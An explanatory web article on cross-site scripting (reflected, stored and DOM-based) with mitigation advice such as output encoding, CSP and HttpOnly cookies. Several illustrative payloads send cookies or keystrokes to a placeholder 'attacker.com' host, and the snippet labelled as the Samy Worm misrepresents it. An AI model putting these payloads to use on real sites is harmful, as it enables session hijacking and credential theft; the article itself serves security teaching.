Introduction
Cross-Site Scripting (XSS) is a major web security vulnerability that allows attackers to inject malicious scripts into trusted websites. These scripts execute in the victim’s browser, leading to data theft, session hijacking, phishing, and unauthorized actions.
Based on Fogie et al., Chapter 2, this article explores XSS attack types, real-world examples, and effective prevention techniques.
Understanding XSS Attacks
XSS vulnerabilities arise when web applications fail to properly validate or escape user inputs, allowing attackers to inject JavaScript, HTML, or other executable code into web pages.
Why is XSS Dangerous?
✅ Steals user data (cookies, session tokens, credentials).
✅ Defaces websites or manipulates content.
✅ Spreads malware via malicious redirects.
✅ Bypasses security mechanisms, such as Same-Origin Policy.
Types of XSS Attacks
1. Reflected XSS (Non-Persistent XSS)
- The malicious script is injected via a URL or form input and immediately reflected back in the server’s response.
- Requires social engineering (e.g., phishing emails or malicious links) to exploit.
Example of Reflected XSS in a Search Query:
htmlCopy codehttp://example.com/search?q=<script>alert('Hacked!');</script>
If the web application includes user input in the response without encoding, the script executes in the victim’s browser.
Real-World Example:
- eBay (2014): Attackers exploited reflected XSS to steal login credentials through phishing emails.
Mitigation:
✅ Escape user input before rendering it.
✅ Use HTTP security headers (e.g., Content Security Policy (CSP)).
2. Persistent XSS (Stored XSS)
- The malicious script is stored on the target website (e.g., in a database, comment section, or user profile).
- Affects all users who view the infected content.
Example:
An attacker posts a comment containing:
htmlCopy code<script>document.location='http://attacker.com/steal?cookie=' + document.cookie;</script>
Every user viewing the comment unknowingly sends their session cookies to the attacker, leading to account hijacking.
Real-World Example:
- MySpace Samy Worm (2005): A self-replicating stored XSS attack spread across over 1 million MySpace accounts in 24 hours.
Mitigation:
✅ Sanitize input before storing it in a database.
✅ Use allowlists for allowed HTML elements.
3. DOM-Based XSS
- The vulnerability exists in JavaScript on the client side, where user input is manipulated within the DOM without proper validation.
- Unlike Reflected and Stored XSS, no server-side request is needed for execution.
Example:
javascriptCopy codevar user = document.location.search.substring(1);
document.write("Hello " + user);
If an attacker visits:
phpCopy codehttp://example.com/?<script>alert('Hacked!')</script>
The script executes in the victim’s browser.
Real-World Example:
- Twitter (2010): A DOM-based XSS vulnerability allowed attackers to execute JavaScript in users’ sessions, leading to spam messages and phishing attacks.
Mitigation:
✅ Avoid document.write()
and innerHTML
for user input.
✅ Use secure JavaScript APIs (e.g., textContent
, setAttribute
).
Advanced XSS Exploitation Techniques
1. Session Hijacking via Cookie Theft
- Attackers use XSS to steal session cookies and hijack user accounts.
Example:
htmlCopy code<script>document.location='http://attacker.com/steal.php?cookie=' + document.cookie;</script>
The attacker captures session tokens, granting access to the victim’s account.
Prevention:
✅ Set the HttpOnly flag on cookies to prevent JavaScript access.
cssCopy codeSet-Cookie: session_id=abc123; HttpOnly; Secure
2. Keylogging and Credential Theft
- Attackers inject scripts to record keystrokes and steal login credentials.
Example:
htmlCopy code<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/log?key=' + e.key);
}
</script>
Prevention:
✅ Use CSP to block unauthorized script execution.
3. Self-Replicating XSS Worms
- Attackers create auto-spreading scripts that execute on every infected page.
Example:
The Samy Worm (2005) injected JavaScript into MySpace profiles, replicating itself whenever a profile was viewed.
htmlCopy code<script>
var i=new Image();
i.src="http://attacker.com/cookie.php?c="+document.cookie;
document.body.appendChild(i);
</script>
Prevention:
✅ Use strict input sanitization and security headers.
Defensive Measures Against XSS Attacks
Attack Type | Prevention Techniques |
---|---|
Reflected XSS | Escape user input, CSP headers, avoid direct user input in responses |
Stored XSS | Sanitize stored data, allowlist HTML elements, enable input validation |
DOM-Based XSS | Use secure JavaScript APIs, avoid document.write() |
Session Hijacking | Use HttpOnly cookies to prevent script access |
Keylogging Attacks | Restrict JavaScript execution via CSP |
Worm Propagation | Disable inline scripts, implement WAF rules |
Best Practices for Preventing XSS
1. Input Validation and Output Encoding
✅ Sanitize user input using allowlists.
✅ Encode output to prevent script execution.
phpCopy codeecho htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
2. Use Content Security Policy (CSP)
✅ Restrict script execution to trusted sources.
cssCopy codeContent-Security-Policy: default-src 'self'; script-src 'self';
3. Set Secure Cookie Attributes
✅ Prevent JavaScript from accessing cookies.
cssCopy codeSet-Cookie: session_id=xyz; HttpOnly; Secure
4. Implement Web Application Firewalls (WAFs)
✅ Block malicious XSS payloads before they reach the server.
Recommended WAFs:
- ModSecurity
- Cloudflare WAF
- Imperva WAF
5. Use Secure JavaScript APIs
✅ Avoid innerHTML
, document.write()
, and eval()
.
✅ Use textContent
and setAttribute()
instead.
Conclusion
XSS attacks remain one of the most widespread and dangerous web security threats. From stealing user data to spreading worms, XSS exploits can severely compromise web applications.
Key Takeaways:
✅ Sanitize and validate all user input.
✅ Use CSP and secure cookies to limit script execution.
✅ Regularly test for vulnerabilities using security tools like Burp Suite and OWASP ZAP.
By following these security best practices, developers can protect web applications from XSS attacks and ensure user safety.
We love to share our knowledge on current technologies. Our motto is ‘Do our best so that we can’t blame ourselves for anything“.